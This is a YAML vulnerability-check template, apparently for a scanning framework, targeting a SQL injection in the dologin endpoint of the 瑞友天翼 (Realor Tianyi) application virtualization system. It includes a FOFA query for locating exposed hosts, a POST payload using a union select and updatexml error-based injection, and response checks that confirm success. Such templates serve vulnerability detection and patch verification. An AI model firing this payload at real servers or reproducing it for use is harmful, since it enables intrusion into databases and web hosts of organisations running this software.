product: 瑞友天翼应用虚拟化系统
vName: 瑞友天翼应用虚拟化系统 dologin SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权，基于服务器计算（Server-based Computing）架构的应用虚拟化平台。瑞友天翼应用虚拟化系统存在SQL注入漏洞，攻击者可以利用此漏洞获得数据库和WEB主机权限。
version: ''
note: ''
search:
  FOFA: app="REALOR-天翼应用虚拟化系统"
protocol: http
link: https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247483970&idx=1&sn=a4619b2b440e9b98d1698627d8415aef&chksm=974b8f45a03c0653f5d3f046bec3956cd4cfa7b49f09bfae48685c7d921c6842e016c5194530&scene=178&cur_album_id=2873032428486115330#rd
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /index.php?s=/Index/dologin/name
      data: 'name=1'')+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,updatexml(1,concat(0x7e,MD5(123456),0x7e),1)-- -'
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - XPATH syntax error
            logic: and
        - body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and